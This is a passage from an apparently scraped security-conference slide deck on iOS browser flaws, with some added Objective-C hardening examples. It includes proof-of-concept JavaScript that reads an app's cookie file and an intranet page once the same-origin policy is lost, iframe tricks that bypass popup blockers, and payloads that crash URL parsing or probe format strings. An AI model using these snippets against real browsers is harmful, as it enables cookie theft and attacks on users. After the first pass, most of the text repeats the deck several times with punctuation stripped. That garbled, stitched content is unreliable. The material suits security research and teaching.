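The cached decision lets the write land in accounts.example, and the nil base lands it in applewebdata://; the corrected policy denies the first and gives the second an opaque origin.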
CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank');
  w.document.write('<script>document.write(location.href)</script>');
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other with an .html filename
JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
}
</script>
JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest(); x.open('GET', 'https://yourintranet/', false); x.send(); alert(x.responseText);
</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
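Added example (not code from the slides): one way for a browser app to display a downloaded or otherwise untrusted HTML file without handing it the applewebdata:// or file:// origin, following the options listed above. The function names are hypothetical.

```objc
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Added example, not from the presentation. Function names are hypothetical.

// Display untrusted HTML (e.g. a downloaded attachment) in a UIWebView.
// baseURL:nil would give the document the applewebdata:// origin, which has
// no same-origin policy; about:blank gives it a unique, unprivileged origin.
static void displayUntrustedHTML(UIWebView *webView, NSData *fileData, BOOL asPlainText)
{
    NSURL *blank = [NSURL URLWithString:@"about:blank"];
    // URLWithString: returns nil for strings it cannot parse, and a nil
    // baseURL is exactly the applewebdata:// case: never fall through with nil.
    if (blank == nil) {
        NSLog(@"could not build about:blank base URL; refusing to load");
        return;
    }

    if (asPlainText) {
        // Option 1: show the file as text/plain, so markup is displayed, not interpreted.
        [webView loadData:fileData
                 MIMEType:@"text/plain"
         textEncodingName:@"utf-8"
                  baseURL:blank];
        return;
    }

    // Option 2: render as HTML, but with about:blank as the base URL.
    NSString *html = [[NSString alloc] initWithData:fileData encoding:NSUTF8StringEncoding];
    if (html == nil) {
        NSLog(@"file is not valid UTF-8; refusing to load");
        return;
    }
    [webView loadHTMLString:html baseURL:blank];
}

// iOS 8: a WKWebView for untrusted local HTML with JavaScript turned off in
// its configuration, so the document cannot run script at all.
static WKWebView *makeScriptlessWebView(CGRect frame)
{
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    return [[WKWebView alloc] initWithFrame:frame configuration:config];
}
```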
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Mobile Browsers Security: iOS
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
(diagram: Native (WebKit), Application (bolted-on), Bridge (internal), Registered (external))
• scheme://download?https://secure.tld/victimdata vs. scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
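Added example (not code from the slides): a UIWebViewDelegate that honours the app's internal bridge scheme and other registered schemes only for top-level, user-initiated navigations, so a hidden iframe cannot drive them, and that checks for nil URLs before any NSURL/CFURL work. The scheme name "mybrowser", the class and the handler are hypothetical.

```objc
#import <UIKit/UIKit.h>

// Added example, not from the presentation. "mybrowser" stands in for the
// app's own bridge scheme; the class and handler are hypothetical.
static NSString *const kBridgeScheme = @"mybrowser";

@interface BridgeGuard : NSObject <UIWebViewDelegate>
@end

@implementation BridgeGuard

// A top-level navigation carries a request whose URL equals mainDocumentURL;
// a load inside an <iframe> does not.
- (BOOL)isTopLevelRequest:(NSURLRequest *)request
{
    return request.mainDocumentURL != nil && [request.URL isEqual:request.mainDocumentURL];
}

- (BOOL)webView:(UIWebView *)webView
    shouldStartLoadWithRequest:(NSURLRequest *)request
                navigationType:(UIWebViewNavigationType)navigationType
{
    NSURL *url = request.URL;
    // Foundation returns nil for strings it cannot parse (e.g. broken percent
    // encoding such as "http://%5c"); a nil handed on to CFURL functions is a
    // null pointer dereference, so stop here.
    if (url == nil || url.scheme == nil) {
        return NO;
    }
    NSString *scheme = url.scheme.lowercaseString;

    // Ordinary web content: let WebKit load it, frames included.
    if ([scheme isEqualToString:@"http"] || [scheme isEqualToString:@"https"] ||
        [scheme isEqualToString:@"about"] || [scheme isEqualToString:@"data"]) {
        return YES;
    }

    // Anything else (our bridge scheme, or a scheme registered by another
    // app) is only honoured for a link the user actually tapped in the top
    // document; a hidden <iframe src="scheme://..."> never qualifies.
    BOOL userInitiated = (navigationType == UIWebViewNavigationTypeLinkClicked)
                         && [self isTopLevelRequest:request];
    if (!userInitiated) {
        NSLog(@"dropping non-user-initiated %@:// navigation", scheme);
        return NO;
    }

    if ([scheme isEqualToString:kBridgeScheme]) {
        [self handleBridgeCommand:url];
    } else if ([[UIApplication sharedApplication] canOpenURL:url]) {
        // External app scheme: this is the point at which to ask the user first.
        [[UIApplication sharedApplication] openURL:url];
    }
    return NO; // never load a non-web scheme as a page
}

- (void)handleBridgeCommand:(NSURL *)url
{
    // e.g. mybrowser://download?https://... : the embedded target must be
    // parsed and validated here before it is acted upon (hypothetical handler).
    NSLog(@"bridge command %@ with query %@", url.host, url.query);
}

@end
```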
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with privileges of the top frame -> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
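Added example (not code from the slides): a fill decision keyed on the page's full origin (scheme, host, port) instead of its domain, so a credential saved on an https site is not offered to the same host over http or to another host under the same domain; sub-frames are never filled because the injected JavaScript only sees the top document. Names are hypothetical.

```objc
#import <Foundation/Foundation.h>

// Added example, not from the presentation. Names are hypothetical.

// Port actually in use, filling in the scheme default when the URL has none.
static NSNumber *effectivePort(NSURL *url)
{
    if (url.port != nil) return url.port;
    NSString *scheme = url.scheme.lowercaseString;
    if ([scheme isEqualToString:@"https"]) return @443;
    if ([scheme isEqualToString:@"http"])  return @80;
    return nil;
}

// savedOrigin: origin recorded when the credential was stored.
// pageURL:     the document's real location, taken from the native request
//              (mainDocumentURL), not from JavaScript running in the page.
// isTopFrame:  injected JavaScript only sees the top document, so forms in
//              sub-frames are never filled.
static BOOL shouldAutofill(NSURL *savedOrigin, NSURL *pageURL, BOOL isTopFrame)
{
    if (savedOrigin == nil || pageURL == nil || !isTopFrame) return NO;

    NSString *savedScheme = savedOrigin.scheme.lowercaseString;
    NSString *pageScheme  = pageURL.scheme.lowercaseString;
    // Scheme is part of the origin: https and http are different sites.
    if (savedScheme == nil || ![savedScheme isEqualToString:pageScheme]) return NO;

    // Exact host match; no "same registrable domain" relaxation.
    NSString *savedHost = savedOrigin.host.lowercaseString;
    NSString *pageHost  = pageURL.host.lowercaseString;
    if (savedHost == nil || ![savedHost isEqualToString:pageHost]) return NO;

    NSNumber *savedPort = effectivePort(savedOrigin);
    NSNumber *pagePort  = effectivePort(pageURL);
    return savedPort != nil && [savedPort isEqual:pagePort];
}
```

With a credential saved for https://login.example.com/, this returns YES for a top-frame form on https://login.example.com/account and NO for http://login.example.com/, https://www.example.com/ or any sub-frame.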
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 53: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/53.jpg)
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 54: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/54.jpg)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 55: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/55.jpg)
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 56: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/56.jpg)
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
